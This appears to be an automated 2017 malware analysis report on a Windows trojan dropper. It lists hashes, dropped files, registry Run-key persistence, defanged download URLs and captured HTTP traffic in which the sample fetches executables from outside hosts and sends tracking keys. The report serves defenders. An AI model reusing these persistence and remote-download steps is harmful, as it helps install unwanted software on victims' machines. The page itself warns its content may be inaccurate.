Gen.Variant.Barys.51615_5a27ccdd7f

by malwarelabrobot on September 1st, 2017 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Barys.51615 (B) (Emsisoft), Gen:Variant.Barys.51615 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 5a27ccdd7f913de15e3e50055a89bed0
SHA1: c76f750007218c9f293e9516df3a8920168af4af
SHA256: a9b3e67620d1562355932030a0a15ef180f2db6c44da6556392424e496a317a2
SSDeep: 3072:plf679qfx9slPmwJty58LIxlsgmBemG5CFCJIpiHleu/L8DMKp1pPA:X679qp9Mry504s95FyXHQ0TK3
Size: 261120 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-08-24 04:07:07
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:3360
Sho9libi.exe:3352
SecondL.exe:2304
OneTwo.exe:2324

The Trojan injects its code into the following process(es):

%original file name%.exe:3496
mt2nc53t201.exe:3588
9HE87PWAK.exe:2628

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3496 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\OneTwo.exe (7856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\OneTwo.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\Sho9libi.exe (146738 bytes)
C:\config.conf (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\SecondL.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\Sho9libi.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\SecondL.exe (208 bytes)

The process Sho9libi.exe:3352 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (1404 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (1404 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.3352.366851 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.3352.366851 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.3352.366851 (0 bytes)

The process SecondL.exe:2304 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\ewu301kb1f3\mt2nc53t201.exe (204 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\ewu301kb1f3\mt2nc53t201.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (856 bytes)

The process OneTwo.exe:2324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\9HE87PWAKQ\9HE87PWAK.exe.config (1 bytes)
%Program Files%\9HE87PWAKQ\9HE87PWAK.exe (53713 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (852 bytes)
%Program Files%\9HE87PWAKQ\uninstaller.exe (19389 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (852 bytes)
%Program Files%\9HE87PWAKQ\uninstaller.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)

The Trojan deletes the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2324.363310 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2324.363310 (0 bytes)

The process 9HE87PWAK.exe:2628 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\9HE87PWAKQ\cast.config (37 bytes)

Registry activity

The process %original file name%.exe:3496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\5a27ccdd7f913de15e3e50055a89bed0_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\5a27ccdd7f913de15e3e50055a89bed0_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\5a27ccdd7f913de15e3e50055a89bed0_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\5a27ccdd7f913de15e3e50055a89bed0_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\5a27ccdd7f913de15e3e50055a89bed0_RASAPI32]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\5a27ccdd7f913de15e3e50055a89bed0_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\5a27ccdd7f913de15e3e50055a89bed0_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_HA00P" = "C:\%original file name%.exe"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process %original file name%.exe:3360 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process Sho9libi.exe:3352 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

The process SecondL.exe:2304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableFileTracing" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process mt2nc53t201.exe:3588 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"lb5nwgevyag" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\ewu301kb1f3\mt2nc53t201.exe"

The process OneTwo.exe:2324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableFileTracing" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process 9HE87PWAK.exe:2628 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\9HE87PWAK_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\9HE87PWAK_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\9HE87PWAK_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\9HE87PWAK_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\9HE87PWAK_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\9HE87PWAK_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\9HE87PWAK_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\9HE87PWAK_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\9HE87PWAK_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\9HE87PWAK_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\9HE87PWAK_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\9HE87PWAK_RASAPI32]
"ConsoleTracingMask" = "4294901760"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"34Y2QEO0XU7NPC7" = "%Program Files%\9HE87PWAKQ\9HE87PWAK.exe"

Dropped PE files

MD5 File path
6203e55fd157282662fc6aea23e5cb70 c:\Program Files\9HE87PWAKQ\9HE87PWAK.exe
fdd3424eccf62d09ea5bf9ee27b9417b c:\Program Files\9HE87PWAKQ\uninstaller.exe
01d524aa409195160b923be02d634be7 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\OneTwo.exe
f9b3e3b6df9d735c87d97f163640526a c:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\SecondL.exe
bfc7eb837ad2a9903a4e61d28c684ae1 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\243GKURU6R\Sho9libi.exe
e0638234fb697f2c4ff961fee8f702f6 c:\Users\"%CurrentUserName%"\AppData\Roaming\ewu301kb1f3\mt2nc53t201.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: 0M3XWT
Product Name: 0M3XWT
Product Version: 8.3.1.0
Legal Copyright: Copyright (c) 5990
Legal Trademarks:
Original Filename: JijiLaPute.exe
Internal Name: JijiLaPute.exe
File Version: 8.3.1.0
File Description: 0M3XWTB
Comments: 0M3
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 47116 47616 4.28771 21cc7a868e0a2c112bbb916a2a0a6b87
.rsrc 57344 212216 212480 3.83739 21542cc044b5bf776dfc9f764723e4e9
.reloc 270336 12 512 0.056519 ba012dcb17de38ea49624f5f14992194

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.wizzmonetize.com/remotes_xml_sections.php 176.31.252.54
hxxp://bratitlamio.com/from_backup/747474/AdsShow_installer.exe 94.23.199.17
hxxp://bratitlamio.com/3/000000/wizzcaster_installer_v2.exe 94.23.199.17
hxxp://bratitlamio.com/exe/updater.exe 94.23.199.17
hxxp://bratitlamio.com/safe_download/582369/AdsShow.exe 94.23.199.17
hxxp://bratitlamio.com/download/3/wizzcaster_v2.exe 94.23.199.17
hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load 176.31.252.54
hxxp://bratitlamio.com/download/3/wizzcaster_uninstaller_v2.exe 94.23.199.17
hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok 176.31.252.54
hxxp://www.wizzmonetize.com/api/v5/config 176.31.252.54
hxxp://www.wizzmonetize.com/api/v5/link 176.31.252.54
hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load 176.31.107.87
hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok 176.31.107.87
hxxp://ladomainadeserver.com/api/v5/config 176.31.115.114
hxxp://ladomainadeserver.com/api/v5/link 176.31.115.114
dns.msftncsi.com 131.107.255.255


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive

api_key=fa02609b-2368-11e6-922f-0cc47a47968c
HTTP/1.1 100 Continue
HTTP/1.1 200 OK..Date: Thu, 31 Aug 2017 18:18:02 GMT..Server: Apache/2
.4.10 (Debian)..Set-Cookie: PHPSESSID=g6km0oaep4njvfc6ntmvsj1871; path
=/..Expires: Thu, 19 Nov 1981 08:52:00 GMT..Cache-Control: no-store, n
o-cache, must-revalidate, post-check=0, pre-check=0..Pragma: no-cache.
.Access-Control-Allow-Origin: *..Content-Length: 29..Keep-Alive: timeo
ut=10, max=100..Connection: Keep-Alive..Content-Type: text/html; chars
et=UTF-8..{"message":"Track was added"}....


POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue


HTTP/1.1 100 Continue
....




api_key=fa02609b-2368-11e6-922f-0cc47a47968c

HTTP/1.1 200 OK


Date: Thu, 31 Aug 2017 18:18:02 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=a1iv6fekvp9ioc6qj17oiiief5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}..



POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




uid=57a764d042bf8&days_after_install=0

HTTP/1.1 200 OK


Date: Thu, 31 Aug 2017 18:18:05 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=d1b9b20e3b89c3225db6a37e5b5323e4ac9e3175; expires=Thu, 31-Aug-2017 20:18:05 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"time_between_prints":"15"}HTTP/1.1 200 OK..Date: Thu, 31 Aug 2017 18
:18:05 GMT..Server: Apache/2.4.10 (Debian)..Cache-Control: no-cache..S
et-Cookie: laravel_session=d1b9b20e3b89c3225db6a37e5b5323e4ac9e3175; e
xpires=Thu, 31-Aug-2017 20:18:05 GMT; Max-Age=7200; path=/; httponly..
Content-Length: 28..Keep-Alive: timeout=10, max=100..Connection: Keep-
Alive..Content-Type: text/html; charset=UTF-8..{"time_between_prints":
"15"}....


POST /api/v5/link HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 17
Expect: 100-continue


HTTP/1.1 100 Continue
....




uid=57a764d042bf8

HTTP/1.1 200 OK


Date: Thu, 31 Aug 2017 18:18:05 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=a53c3d52b3b1a6259a24972804ebd40a489d37db; expires=Thu, 31-Aug-2017 20:18:05 GMT; Max-Age=7200; path=/; httponly
Content-Length: 66
Content-Type: text/html; charset=UTF-8
{"link":"http:\/\/ladomainadeserver.com\/redirect\/57a764d042bf8"}..



GET /from_backup/747474/AdsShow_installer.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 31 Aug 2017 18:17:56 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow_installer.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
2a00..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
..C..Y.........."...0.............N=... ...@....@.. ..................
..................@..................................<..O....@..T..
..................`.......;...........................................
.... ............... ..H............text...T.... .....................
. ..`.rsrc...T....@....... ..............@..@.reloc.......`.......(...
...........@..B................0=......H........#..D............;.....
..........................................0..%.............(....(....r
...pr...po....(......(....&.(....r...pr...po....r...p(....(........ T.
.... ..........,........ #.....3..... ......,......X......X.... X.....
....-.....X.... ..........-.... ...... ..........,.........X.... .....
.....-..(.....(...........%.r...p.%.ra..p.%.r...p.%.r...p.%.rG..p.%.r[
..p.%.rB..p.%.rR..p.%.r...p.%..r...p.%..rQ..p.%..r...p.%..r...p.%..r:.
.p.%..r...p.%..r...p.%..r...p.%..r9..p.%..rQ..p.%..r...p.%..r...p.%..r
...p.%..r...p.%..r...p.%..r...p.%..r...p.(.......r...p(......(........
......,.....(....& ..r...p(....&.........*...A........................
....0..f........r...p.r!..p... ".. ..........,...r7..p(.........X.. ..
........-.s.......rG..p(....s.....o.....r...p.*".( ....*&.( .....*....
0..9........~.........,".r...p.....(!...o"...s#...........~..... ..*..
..0...........~..... ..*".......*.0...........~..... ..*".($....*Vs...
.(%...t.........*..BSJB............v2.0.50727......l...$...#~.....
<<< skipped >>>

GET /3/000000/wizzcaster_installer_v2.exe HTTP/1.1


Host: bratitlamio.com


HTTP/1.1 200 OK
Date: Thu, 31 Aug 2017 18:17:56 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_installer_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
39000..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...TD.Y.........."...0..v............... ........@.. .................
...................@.................................\...O.......l....
.......................$..............................................
.. ............... ..H............text....u... ...v.................. 
..`.rsrc...l............x..............@..@.reloc.....................
.........@..B........................H........!.............../..Xd...
........................................0..........(....(.....~....(..
...~....(.....(......o........io.....(.....o....(....(........o....r..
.po.......o....t#..........%...o....&..&..*.................0..3......
.(....~....o......s....%o .....o!...o".......&.....*.........,,.......
0..........s#......&.....*.................~r...p.....rY..p.....rs..p.
....*..($...*.~....-.r...p.....(%...o&...s'........~....*.~....*......
.*.~....*..((...*Vs....()...t.........*BSJB............v2.0.50727.....
.l...\...#~..........#Strings............#US.l.......#GUID...|...\...#
Blob...........W..........3........(...................)..............
.....................................4...........h....................
...............T.....m.................&...........@.P.....P..........
.P...A...........4.H...K...........8.................|...........S.P..
.W.....j.......[.....P.................................f.P............
.............H.V.=...........#.=.........7.#.q...................}
<<< skipped >>>

GET /exe/updater.exe HTTP/1.1


Host: bratitlamio.com


HTTP/1.1 200 OK
Date: Thu, 31 Aug 2017 18:17:57 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="updater.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
241c00..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L...cD.Y.........."...0...!.........V !.. ...@!...@.. ................
........$...........@.................................. !.O....@!.l...
.................`$.......!...........................................
... ............... ..H............text...\.!.. ....!.................
 ..`.rsrc...l....@!.......!.............@..@.reloc.......`$.......$...
..........@..B................8 !.....H........!.............../.... .
.........................................0..........(....(.....~....(.
....~....(.....(......o........io.....(.....o....(....(........o....r.
..po.......o....t#..........%...o....&..&..*.................0..3.....
..(....~....o......s....%o .....o!...o".......&.....*.........,,......
.0..........s#......&.....*.................~r...p.....rY..p.....rs..p
.....*..($...*.~....-.r...p.....(%...o&...s'........~....*.~....*.....
..*.~....*..((...*Vs....()...t.........*BSJB............v2.0.50727....
..l...\...#~..........#Strings............#US.l.......#GUID...|...\...
#Blob...........W..........3........(...................).............
......................................4...........h...................
................T.....m.................&...........@.P.....P.........
..P...A...........4.H...K...........8.................|...........S.P.
..W.....j.......[.....P.................................f.P...........
..............H.V.=...........#.=.........7.#.q...................
<<< skipped >>>


GET /download/3/wizzcaster_v2.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 31 Aug 2017 18:18:00 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
12e200..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L...SD.Y.........."...0.............v.... ........@.. ................
.......@............@.................................$...O.......@...
................. ....................................................
... ............... ..H............text...|.... ......................
 ..`.rsrc...@...........................@..@.reloc....... ............
..........@..B................X.......H........!.............../.. ...
.........................................0..........(....(.....~....(.
....~....(.....(......o........io.....(.....o....(....(........o....r.
..po.......o....t#..........%...o....&..&..*.................0..3.....
..(....~....o......s....%o .....o!...o".......&.....*.........,,......
.0..........s#......&.....*.................~r...p.....rY..p.....rs..p
.....*..($...*.~....-.r...p.....(%...o&...s'........~....*.~....*.....
..*.~....*..((...*Vs....()...t.........*BSJB............v2.0.50727....
..l...\...#~..........#Strings............#US.l.......#GUID...|...\...
#Blob...........W..........3........(...................).............
......................................4...........h...................
................T.....m.................&...........@.P.....P.........
..P...A...........4.H...K...........8.................|...........S.P.
..W.....j.......[.....P.................................f.P...........
..............H.V.=...........#.=.........7.#.q...................
<<< skipped >>>

GET /download/3/wizzcaster_uninstaller_v2.exe HTTP/1.1


Host: bratitlamio.com


HTTP/1.1 200 OK
Date: Thu, 31 Aug 2017 18:18:01 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_uninstaller_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
7dc00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...TD.Y.........."...0.............V.... ........@.. .................
......@............@.....................................O.......l....
................ .....................................................
.. ............... ..H............text...\.... ...................... 
..`.rsrc...l...........................@..@.reloc....... .............
.........@..B................8.......H........!.............../.......
........................................0..........(....(.....~....(..
...~....(.....(......o........io.....(.....o....(....(........o....r..
.po.......o....t#..........%...o....&..&..*.................0..3......
.(....~....o......s....%o .....o!...o".......&.....*.........,,.......
0..........s#......&.....*.................~r...p.....rY..p.....rs..p.
....*..($...*.~....-.r...p.....(%...o&...s'........~....*.~....*......
.*.~....*..((...*Vs....()...t.........*BSJB............v2.0.50727.....
.l...\...#~..........#Strings............#US.l.......#GUID...|...\...#
Blob...........W..........3........(...................)..............
.....................................4...........h....................
...............T.....m.................&...........@.P.....P..........
.P...A...........4.H...K...........8.................|...........S.P..
.W.....j.......[.....P.................................f.P............
.............H.V.=...........#.=.........7.#.q...................}
<<< skipped >>>


GET /safe_download/582369/AdsShow.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 31 Aug 2017 18:18:00 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
2000..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
.....Y.........."...0.............F2... ...@....@.. ..................
..................@..................................1..O....@..<..
..................`.......0...........................................
.... ............... ..H............text...L.... .....................
. ..`.rsrc...<....@......................@..@.reloc.......`........
..............@..B................(2......H.......("...............0..
.............................................0............s...........
.,N.~....r...p.o......(....r]..pra..po....rc..p(....o....rc..p(....o..
....o...... Z.rg..p(.............,...........,.. `......o....Z(......r
q..p(....&. `.......o....Z(......... .&....*...................0..4...
.....r...p..rg..p( .....,...r...p(!...("........ ... ..*".(#....*&.(#.
....*..0..9........~.........,".r...p.....($...o%...s&...........~....
. ..*....0...........~..... ..*".......*.0...........~..... ..*".('...
.*Vs....((...t.........*..BSJB............v2.0.50727......l...$...#~..
....t...#Strings........@...#US.D.......#GUID...T.......#Blob.........
..W..........3........$...................(...........................
....................J.F.....F...~.................-.................j.
..................'...<.'...........K.....K...R.K...2.......K...J..
...a.....!.F.....f...........&.....&.....w...\.....!.......K...S.....9
.............K...e.K.....w...................<...=.............
<<< skipped >>>


POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.wizzmonetize.com
Content-Length: 169
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47
a47968c&buying_product_name=DefaultProduct&buying_partner_name=Default
Partner&buying_channel_name=1

HTTP/1.1 200 OK


Date: Thu, 31 Aug 2017 18:17:29 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=024e2i2k6818d1e0k8b29500t1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1608
